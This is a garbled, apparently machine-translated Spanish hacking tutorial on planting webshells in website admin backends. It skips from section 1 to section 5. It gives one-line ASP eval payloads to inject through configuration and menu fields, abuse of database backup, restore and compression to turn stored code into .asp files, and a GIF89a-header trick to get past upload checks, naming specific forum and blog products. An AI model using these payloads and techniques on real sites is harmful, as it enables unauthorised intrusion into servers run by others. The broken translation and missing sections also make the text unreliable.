Cómo ingresar al backend del sitio web y obtener el webshell para ingresar al backend
1. Cargar directamente para obtener webshell
Este tipo de programa para php y jsp es relativamente común. MolyX BOARD es uno de ellos. Carga directamente el tipo .php. Gestión de iconos, aunque no hay ningún consejo, de hecho, ha sido exitoso. La URL del archivo cargado debería ser hacker en 263 dot net":eval request(chr (35))//, en el archivo de configuración es webmail=". cnhacker en 263 dot net\":eval request( chr(35))//", otra forma es escribir cnhacker en 263 dot net"%><%eval request(chr(35))%><%', esto Formará una correspondencia entre el frente y la parte posterior, y el caballo más pequeño también se ejecutará <%eval request(chr(35))%> Puede utilizar el remitente eval de lake2 y el último cliente de 2006. al insertar la base de datos, debe elegir el primero Administración del Centro de artículos-Configuración del menú superior-Menú Otros efectos especiales, inserte la oración "%><%ejecutar solicitud ("l")%><%', guarde el menú de la columna superior. Si configura el parámetro correctamente, obtendremos la dirección del caballo http: //Website/admin/rootclass_menu_config.asp.
5. Utilice la copia de seguridad y recuperación de la base de datos en segundo plano para obtener webshell.
Utilice principalmente la función "base de datos de respaldo" o "restaurar base de datos" en segundo plano de la base de datos de acceso, "ruta de la base de datos de respaldo", etc. Las variables no se filtran, por lo que puede cambiar el sufijo de cualquier archivo a asp, obteniendo así el webshell. La versión msssql del programa aplica directamente la versión de acceso del código, por lo que aún se puede usar la versión sql. También puede hacer una copia de seguridad del archivo asp del sitio web con otros sufijos, como el archivo .txt, para poder ver y obtener el código fuente de la página web y obtener más información del programa para aumentar las posibilidades de obtener un webshell. En aplicaciones reales, a menudo nos encontramos con momentos en los que no hay función de carga, pero el sistema asp se está ejecutando. Utilice este método para ver el código fuente para obtener la ubicación de su base de datos y crear oportunidades para complementos de base de datos. tiene una IP Para la base de datos de direcciones, puede insertar el caballo más pequeño en la administración de IP en segundo plano y luego hacer una copia de seguridad en un archivo .asp. Hablemos de formas de superar la detección de carga. Muchos programas asp indicarán que el archivo es ilegal incluso después de cambiar el nombre del sufijo. Al agregar gif89a al encabezado del archivo .asp y cambiar el sufijo a gif, puede engañar a la detección del programa asp. y lograr el propósito de cargarlo. Una forma es abrir el archivo de imagen con el Bloc de notas, pegar una parte en el encabezado del archivo troyano asp, modificar el sufijo gif y cargarlo para interrumpir la detección, y luego hacer una copia de seguridad como archivo . asp y obtener con éxito el webshell.
6. Utilice la función de compresión de la base de datos
Puede desactivar la función anti-descarga de datos para que el caballo más pequeño insertado en la base de datos pueda ejecutarse con éxito. Un ejemplo típico es el de loveyuki. L-BLOG, agregado de manera amigable Escriba <% solicitud eval (chr (35))%> en la URL Después del envío, comprima la base de datos en la operación de la base de datos. El archivo .asp se puede comprimir con éxito. de Ocean's Minimal Horse para obtener una concha web.
7. Sistema ASP+mssql
Aquí debemos mencionar la versión mssql de Dongwang, pero se puede enviar directamente para realizar una copia de seguridad localmente. Primero cargue una imagen falsa con un código ASP escrito en ella al publicarla y luego recuerde su ruta de carga. Escribe un formulario enviado localmente